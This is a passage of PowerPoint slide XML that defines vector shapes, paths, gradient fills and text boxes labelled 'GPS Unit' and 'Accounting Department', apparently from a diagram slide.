                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 3134"/>
                  <a:gd name="T1" fmla="*/ 773 h 841"/>
                  <a:gd name="T2" fmla="*/ 0 w 3134"/>
                  <a:gd name="T3" fmla="*/ 239 h 841"/>
                  <a:gd name="T4" fmla="*/ 446 w 3134"/>
                  <a:gd name="T5" fmla="*/ 359 h 841"/>
                  <a:gd name="T6" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T7" fmla="*/ 0 h 841"/>
                  <a:gd name="T8" fmla="*/ 3134 w 3134"/>
                  <a:gd name="T9" fmla="*/ 359 h 841"/>
                  <a:gd name="T10" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T11" fmla="*/ 721 h 841"/>
                  <a:gd name="T12" fmla="*/ 2239 w 3134"/>
                  <a:gd name="T13" fmla="*/ 841 h 841"/>
                  <a:gd name="T14" fmla="*/ 196 w 3134"/>
                  <a:gd name="T15" fmla="*/ 773 h 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4" h="841">
                    <a:moveTo>
                      <a:pt x="196" y="773"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3134" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="773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581" name="Group 877"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="8264605" y="2980038"/>
              <a:ext cx="465583" cy="140176"/>
              <a:chOff x="-240" y="-1656"/>
              <a:chExt cx="3137" cy="940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="582" name="Freeform 878"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="658" y="-1656"/>
                <a:ext cx="446" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 446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6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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446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3" name="Freeform 879"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1656"/>
                <a:ext cx="3137" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T1" fmla="*/ 54 h 843"/>
                  <a:gd name="T2" fmla="*/ 898 w 3137"/>
                  <a:gd name="T3" fmla="*/ 0 h 843"/>
                  <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T5" fmla="*/ 120 h 843"/>
                  <a:gd name="T6" fmla="*/ 0 w 3137"/>
                  <a:gd name="T7" fmla="*/ 482 h 843"/>
                  <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T9" fmla="*/ 843 h 843"/>
                  <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                  <a:gd name="T11" fmla="*/ 482 h 843"/>
                  <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                  <a:gd name="T13" fmla="*/ 602 h 843"/>
                  <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T15" fmla="*/ 54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7" h="843">
                    <a:moveTo>
                      <a:pt x="2887" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="898" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3137" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2887" y="54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4" name="Freeform 880"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 97 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 458 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 361 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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5" name="Freeform 881"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2448" y="-1174"/>
                <a:ext cx="449" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 449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9" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449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6" name="Freeform 882"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1104" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 458 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 97 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344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458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458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587" name="Text Box 892"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7593379" y="1856232"/>
              <a:ext cx="826237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GPS Unit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88" name="Text Box 897"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="9237172" y="3002555"/>
              <a:ext cx="96372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Accounting</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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Department</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="589" name="Group 588"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7200461" y="2841516"/>
              <a:ext cx="1627038" cy="551941"/>
              <a:chOff x="1931988" y="3321051"/>
              <a:chExt cx="2063750" cy="700087"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="590" name="Freeform 1305"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1931988" y="3465513"/>
                <a:ext cx="2063750" cy="555625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ACACA"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="19050" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd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sp>
            <p:nvSpPr>
              <p:cNvPr id="591" name="Freeform 1310"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2147888" y="3524251"/>
                <a:ext cx="1631950" cy="439738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noFill/>
              <a:ln w="38100" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="00B0F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ACACA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sp>
            <p:nvSpPr>
              <p:cNvPr id="592" name="Line 1706"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2268538" y="3465513"/>
                <a:ext cx="0" cy="25082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sp>
            <p:nvSpPr>
              <p:cNvPr id="593" name="Line 1707"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2627313" y="3357563"/>
                <a:ext cx="0" cy="25082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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="594" name="Group 1688"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2592388" y="3321051"/>
                <a:ext cx="236538" cy="201613"/>
                <a:chOff x="4876" y="-3681"/>
                <a:chExt cx="865" cy="735"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="610" name="Freeform 1689"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5536" y="-3537"/>
                  <a:ext cx="205" cy="506"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 43 w 87"/>
                    <a:gd name="T1" fmla="*/ 9 h 214"/>
                    <a:gd name="T2" fmla="*/ 14 w 87"/>
                    <a:gd name="T3" fmla="*/ 190 h 214"/>
                    <a:gd name="T4" fmla="*/ 69 w 87"/>
                    <a:gd name="T5" fmla="*/ 197 h 214"/>
                    <a:gd name="T6" fmla="*/ 75 w 87"/>
                    <a:gd name="T7" fmla="*/ 4 h 214"/>
                    <a:gd name="T8" fmla="*/ 43 w 87"/>
                    <a:gd name="T9" fmla="*/ 9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7" h="214">
                      <a:moveTo>
                        <a:pt x="43" y="9"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="17"/>
                        <a:pt x="0" y="171"/>
                        <a:pt x="14" y="190"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="209"/>
                        <a:pt x="49" y="214"/>
                        <a:pt x="69" y="197"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="182"/>
                        <a:pt x="87" y="16"/>
                        <a:pt x="75" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="4"/>
                        <a:pt x="58" y="0"/>
                        <a:pt x="43" y="9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611" name="Freeform 1690"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5054" y="-3681"/>
                  <a:ext cx="630" cy="654"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 267"/>
                    <a:gd name="T1" fmla="*/ 8 h 277"/>
                    <a:gd name="T2" fmla="*/ 14 w 267"/>
                    <a:gd name="T3" fmla="*/ 206 h 277"/>
                    <a:gd name="T4" fmla="*/ 247 w 267"/>
                    <a:gd name="T5" fmla="*/ 268 h 277"/>
                    <a:gd name="T6" fmla="*/ 247 w 267"/>
                    <a:gd name="T7" fmla="*/ 70 h 277"/>
                    <a:gd name="T8" fmla="*/ 14 w 267"/>
                    <a:gd name="T9" fmla="*/ 8 h 2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67" h="277">
                      <a:moveTo>
                        <a:pt x="14" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="1" y="187"/>
                        <a:pt x="14" y="206"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="225"/>
                        <a:pt x="234" y="277"/>
                        <a:pt x="247" y="268"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="259" y="260"/>
                        <a:pt x="267" y="108"/>
                        <a:pt x="247" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="240" y="56"/>
                        <a:pt x="28" y="0"/>
                        <a:pt x="14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612" name="Freeform 1691"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5117" y="-3620"/>
                  <a:ext cx="489" cy="527"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 489"/>
                    <a:gd name="T1" fmla="*/ 0 h 527"/>
                    <a:gd name="T2" fmla="*/ 0 w 489"/>
                    <a:gd name="T3" fmla="*/ 397 h 527"/>
                    <a:gd name="T4" fmla="*/ 489 w 489"/>
                    <a:gd name="T5" fmla="*/ 527 h 527"/>
                    <a:gd name="T6" fmla="*/ 489 w 489"/>
                    <a:gd name="T7" fmla="*/ 130 h 527"/>
                    <a:gd name="T8" fmla="*/ 0 w 489"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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9" h="527">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="397"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="527"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="13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69A2E1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="69A2E1">
                        <a:gamma/>
                        <a:tint val="68627"/>
                        <a:invGamma/>
                      </a:srgbClr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613" name="Freeform 1692"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5087" y="-3681"/>
                  <a:ext cx="640" cy="172"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 100 w 271"/>
                    <a:gd name="T1" fmla="*/ 14 h 73"/>
                    <a:gd name="T2" fmla="*/ 41 w 271"/>
                    <a:gd name="T3" fmla="*/ 4 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 271"/>
                    <a:gd name="T5" fmla="*/ 8 h 73"/>
                    <a:gd name="T6" fmla="*/ 233 w 271"/>
                    <a:gd name="T7" fmla="*/ 70 h 73"/>
                    <a:gd name="T8" fmla="*/ 265 w 271"/>
                    <a:gd name="T9" fmla="*/ 65 h 73"/>
                    <a:gd name="T10" fmla="*/ 100 w 271"/>
                    <a:gd name="T11" fmla="*/ 14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1" h="73">
                      <a:moveTo>
                        <a:pt x="100" y="14"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="77" y="9"/>
                        <a:pt x="48" y="4"/>
                        <a:pt x="41" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="4"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="0" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="222" y="60"/>
                        <a:pt x="233" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="237" y="73"/>
                        <a:pt x="271" y="69"/>
                        <a:pt x="265" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="257" y="59"/>
                        <a:pt x="161" y="29"/>
                        <a:pt x="100" y="1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614" name="Freeform 1693"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4876" y="-3154"/>
                  <a:ext cx="660" cy="175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 660"/>
                    <a:gd name="T1" fmla="*/ 52 h 175"/>
                    <a:gd name="T2" fmla="*/ 208 w 660"/>
                    <a:gd name="T3" fmla="*/ 0 h 175"/>
                    <a:gd name="T4" fmla="*/ 660 w 660"/>
                    <a:gd name="T5" fmla="*/ 120 h 175"/>
                    <a:gd name="T6" fmla="*/ 452 w 660"/>
                    <a:gd name="T7" fmla="*/ 175 h 175"/>
                    <a:gd name="T8" fmla="*/ 0 w 660"/>
                    <a:gd name="T9" fmla="*/ 52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0" h="175">
                      <a:moveTo>
                        <a:pt x="0" y="52"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="208" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="660" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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615" name="Freeform 1694"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5328" y="-3034"/>
                  <a:ext cx="198" cy="88"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 198"/>
                    <a:gd name="T1" fmla="*/ 55 h 88"/>
                    <a:gd name="T2" fmla="*/ 0 w 198"/>
                    <a:gd name="T3" fmla="*/ 88 h 88"/>
                    <a:gd name="T4" fmla="*/ 198 w 198"/>
                    <a:gd name="T5" fmla="*/ 36 h 88"/>
                    <a:gd name="T6" fmla="*/ 198 w 198"/>
                    <a:gd name="T7" fmla="*/ 0 h 88"/>
                    <a:gd name="T8" fmla="*/ 0 w 198"/>
                    <a:gd name="T9" fmla="*/ 55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8" h="88">
                      <a:moveTo>
                        <a:pt x="0" y="55"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="88"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="0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616" name="Freeform 1695"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4876" y="-3102"/>
                  <a:ext cx="452" cy="156"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 452 w 452"/>
                    <a:gd name="T1" fmla="*/ 156 h 156"/>
                    <a:gd name="T2" fmla="*/ 0 w 452"/>
                    <a:gd name="T3" fmla="*/ 35 h 156"/>
                    <a:gd name="T4" fmla="*/ 0 w 452"/>
                    <a:gd name="T5" fmla="*/ 0 h 156"/>
                    <a:gd name="T6" fmla="*/ 452 w 452"/>
                    <a:gd name="T7" fmla="*/ 123 h 156"/>
                    <a:gd name="T8" fmla="*/ 452 w 452"/>
                    <a:gd name="T9" fmla="*/ 156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2" h="156">
                      <a:moveTo>
                        <a:pt x="452" y="156"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="15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617" name="Freeform 1696"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4938" y="-3140"/>
                  <a:ext cx="517" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 517"/>
                    <a:gd name="T1" fmla="*/ 38 h 139"/>
                    <a:gd name="T2" fmla="*/ 383 w 517"/>
                    <a:gd name="T3" fmla="*/ 139 h 139"/>
                    <a:gd name="T4" fmla="*/ 517 w 517"/>
                    <a:gd name="T5" fmla="*/ 104 h 139"/>
                    <a:gd name="T6" fmla="*/ 135 w 517"/>
                    <a:gd name="T7" fmla="*/ 0 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 517"/>
                    <a:gd name="T9" fmla="*/ 38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7" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="383" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="517" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="135" y="0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595" name="Group 1697"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2232025" y="3424238"/>
                <a:ext cx="236538" cy="201613"/>
                <a:chOff x="4876" y="-3681"/>
                <a:chExt cx="865" cy="735"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="602" name="Freeform 1698"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5536" y="-3537"/>
                  <a:ext cx="205" cy="506"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 43 w 87"/>
                    <a:gd name="T1" fmla="*/ 9 h 214"/>
                    <a:gd name="T2" fmla="*/ 14 w 87"/>
                    <a:gd name="T3" fmla="*/ 190 h 214"/>
                    <a:gd name="T4" fmla="*/ 69 w 87"/>
                    <a:gd name="T5" fmla="*/ 197 h 214"/>
                    <a:gd name="T6" fmla="*/ 75 w 87"/>
                    <a:gd name="T7" fmla="*/ 4 h 214"/>
                    <a:gd name="T8" fmla="*/ 43 w 87"/>
                    <a:gd name="T9" fmla="*/ 9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7" h="214">
                      <a:moveTo>
                        <a:pt x="43" y="9"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="17"/>
                        <a:pt x="0" y="171"/>
                        <a:pt x="14" y="190"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="209"/>
                        <a:pt x="49" y="214"/>
                        <a:pt x="69" y="197"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="182"/>
                        <a:pt x="87" y="16"/>
                        <a:pt x="75" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="4"/>
                        <a:pt x="58" y="0"/>
                        <a:pt x="43" y="9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603" name="Freeform 1699"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5054" y="-3681"/>
                  <a:ext cx="630" cy="654"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 267"/>
                    <a:gd name="T1" fmla="*/ 8 h 277"/>
                    <a:gd name="T2" fmla="*/ 14 w 267"/>
                    <a:gd name="T3" fmla="*/ 206 h 277"/>
                    <a:gd name="T4" fmla="*/ 247 w 267"/>
                    <a:gd name="T5" fmla="*/ 268 h 277"/>
                    <a:gd name="T6" fmla="*/ 247 w 267"/>
                    <a:gd name="T7" fmla="*/ 70 h 277"/>
                    <a:gd name="T8" fmla="*/ 14 w 267"/>
                    <a:gd name="T9" fmla="*/ 8 h 2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67" h="277">
                      <a:moveTo>
                        <a:pt x="14" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="1" y="187"/>
                        <a:pt x="14" y="206"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="225"/>
                        <a:pt x="234" y="277"/>
                        <a:pt x="247" y="268"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="259" y="260"/>
                        <a:pt x="267" y="108"/>
                        <a:pt x="247" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="240" y="56"/>
                        <a:pt x="28" y="0"/>
                        <a:pt x="14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604" name="Freeform 1700"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5117" y="-3620"/>
                  <a:ext cx="489" cy="527"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 489"/>
                    <a:gd name="T1" fmla="*/ 0 h 527"/>
                    <a:gd name="T2" fmla="*/ 0 w 489"/>
                    <a:gd name="T3" fmla="*/ 397 h 527"/>
                    <a:gd name="T4" fmla="*/ 489 w 489"/>
                    <a:gd name="T5" fmla="*/ 527 h 527"/>
                    <a:gd name="T6" fmla="*/ 489 w 489"/>
                    <a:gd name="T7" fmla="*/ 130 h 527"/>
                    <a:gd name="T8" fmla="*/ 0 w 489"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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9" h="527">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="397"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="527"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="13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69A2E1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="69A2E1">
                        <a:gamma/>
                        <a:tint val="70588"/>
                        <a:invGamma/>
                      </a:srgbClr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605" name="Freeform 1701"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5087" y="-3681"/>
                  <a:ext cx="640" cy="172"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 100 w 271"/>
                    <a:gd name="T1" fmla="*/ 14 h 73"/>
                    <a:gd name="T2" fmla="*/ 41 w 271"/>
                    <a:gd name="T3" fmla="*/ 4 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 271"/>
                    <a:gd name="T5" fmla="*/ 8 h 73"/>
                    <a:gd name="T6" fmla="*/ 233 w 271"/>
                    <a:gd name="T7" fmla="*/ 70 h 73"/>
                    <a:gd name="T8" fmla="*/ 265 w 271"/>
                    <a:gd name="T9" fmla="*/ 65 h 73"/>
